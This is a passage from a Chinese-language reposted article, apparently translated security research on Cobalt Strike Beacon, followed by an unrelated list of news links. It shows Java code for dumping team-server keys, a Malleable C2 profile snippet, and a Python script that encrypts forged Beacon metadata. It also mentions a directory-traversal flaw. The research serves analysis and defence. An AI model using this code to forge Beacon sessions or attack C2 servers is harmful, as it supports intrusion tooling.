}
else {
System.out.println("Could not find .cobaltstrike.beacon_keys file")
}
}
catch (Exception exception) {
System.out.println("Could not read asymmetric keys")
}
}
}
运行时 ， 输出将如下所示：

本文插图

转储密钥

应该注意的是 ， 这完全只是为了在编写漏洞利用程序时进行调试 。 在现实世界中 ， 由于密钥是通过RSA安全协商的 ， 而Beacon只有公共密钥 ， 因此无法解密现有的 Beacon通信 。 但是 ， 如果你拥有公钥（可以通过checksum8下载URL检索到） ， 则可以通过伪会话对任务进行加密和解密 。
Beacon通信加密和元数据
加密 ， 解密和结构
来自Beacon的元数据根据可延展的C2配置文件中的设置发送 。 这允许操作者自定义流量的各种属性 ， 例如元数据blob的发送位置（例如 ， 在标头或cookie中）以及如何对其进行编码 。 以下是来自Cobalt Strike博客示例 。
https://www.cobaltstrike.com/help-malleable-c2
在此示例中 ， 将以Base64编码将元数据发送为名为“user”的Cookie 。
Malleable C2 Config
http-get {
set uri "/foobar"
client {
metadata {
base64
prepend "user="
header "Cookie"
}
}
以下HTTP请求捕获显示了发送给Base64的Cookie头中的Base64编码的元数据blob ， 这是默认设置：

本文插图

Beacon元数据加密使用带有PKCS1填充的RSA ， 以下是Python中使用暂存器公钥加密Beacon元数据的示例：
import M2Crypto
import base64
import binascii

PUBKEY_TEMPLATE = "-----BEGIN PUBLIC KEY-----{}-----END PUBLIC KEY-----"
plaintext = "0000BEEF00000056D48A3A7104FC17544D5A3752C6EEAED4E404B5015FAD878000000A0000000431302E30093139322E3136382E3230302E313031094445534B544F502D3337325251544D0961646D696E0972756E646C6C33322E657865"
buf = M2Crypto.BIO.MemoryBuffer(PUBKEY_TEMPLATE.format("MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDhOfC4TICevrbgiUVK5kmvU8aNQNiCfccHxIOV4wzjOn5DpaC49NLoKMsS2fVnMI/f+cbyuqfrXMYmUX8eZDWkmflrBFNOPG8hr8oqhm1EiIvK9S+CsOuLGsEOmefqYk+Gj1nfnJ1uO9ELRv1U+OhmQ77w4u0AZWHPSNr1STYhZQIDAQAB"))
pubkey = M2Crypto.RSA.load_pub_key_bio(buf)
ciphertext = pubkey.public_encrypt(binascii.unhexlify(plaintext), M2Crypto.RSA.pkcs1_padding)
print (base64.b64encode(ciphertext))
解密后（使用从测试团队服务器中提取的私钥） ， 元数据如下所示：
解密的元数据Blob
所有解密的元数据blob都以8字节为前缀 ， 该字节必须始终存在 。 这8个字节是magic 48879（0xBEEF） ， 后跟数据大小：

本文插图

Beacon元数据结构
因此 ， 我们现在可以加密/解密元数据 ， 现在进入解析 。
Beacon元数据解析

以下Python代码显示了如何分析来自Cobalt StrikeBeacon的元数据 。 在Cobalt Strike&lt4.0上 ， 元数据字段（除了前16个字节之外）由制表符分隔的字符串组成 。 这导致IP地址被视为（未经完整性检查）字符串 ， 在版本3.5中会导致目录遍历问题 。 但是 ， 在更高版本上 ， 使用正则表达式验证IP地址字段以确保它确实是有效的IP地址 。

推荐阅读

• 

  「实战财经」疫情对国人消费习惯造成的三个深远影响
• 

  宜昌夷陵区邓村提速升级 推进茶业跨越发展
• 

  翡翠手镯|翡翠手镯选对类型很重要，手镯的类型不同，适合的人群也不一样
• 

  微微带你笑|我已到深圳了，开心一笑：老婆
• 

  大自然的指南针有哪些？
• 

  行者车视觉修车师傅看到后：车都被你“养”坏了，“国人养车”三大怪现象
• 

  塞尔比|欧洲赛1-5惨败！丁俊晖止步8强，总战绩再次被塞尔比反超
• 

  直播吧|年薪150万欧，斯基拉：库姆布拉将与罗马签约4年
• 

  盛冬惊喜黄金早餐，腊肠炒饭香甜可口，元气满满，火热上线
• 

  直播吧|接班卡里乌斯？，外媒：贝西克塔斯有意罗马门将奥尔森
• 

  「重庆火锅」老干妈逗“鹅”冤
• 

  齐鲁东营资讯|东营区妇联2020“魅力东营”短视频大赛创作训练营暨“指尖上的妇女微家”小程序发布仪式举办
• 

  转母亲一千块，老公却扬言跟我离婚：远嫁的女人不独立，很苦
• 

  鸡与哪些生肖比较旺,最旺鸡的生肖是什么-
• 

  「隔壁老王说车」全球唯一双十佳豪华SUV，比奥迪Q5霸气10倍，仅售27万，今日上市
• 

  篮球小说排行榜完本经典之作 2020好看的篮球小说
• 

  爱辉科技|iPhone斩获单项第一！，到底谁拍照最好？DXO公开年度榜单
• 

  文汇|上海大科学设施群再添新成员
• 

  山东上半年空气质量反弹 重污染天数同比增加3.8天
• 

  『运势』6月23号，运势走红，天赐福禄的3大生肖，赚钱更，发家致富

• 互联网|上线半年收获6700万用户，这款聚焦下沉用户的陌生人社交APP是怎么做到的？
• 互联网|5G商用一周年，华为云向互联网企业大抛绣球
• 互联网|中台产品经理实战(14)：中台与SaaS、微服务关系
• 互联网|行业观察 | 你所不知道的5G消息
• 互联网|多名知名人物推特被黑，拜登奥巴马都“中招”，比尔盖茨也在其内
• 互联网|发放高利贷，还要窃取用户信息？这些金融APP在秀“道德底线”
• 互联网|东莞先知：数字智能，先觉“先知”
• 云计算|从互联网到AI崛起，上海能弯道超车吗？
• 行业互联网,5G|江苏有线顺利完成园区5G信号开通测试
• 行业互联网,AI人工智能|城市教育大脑以“ AI+ 大数据”为核心 , 引领教育变革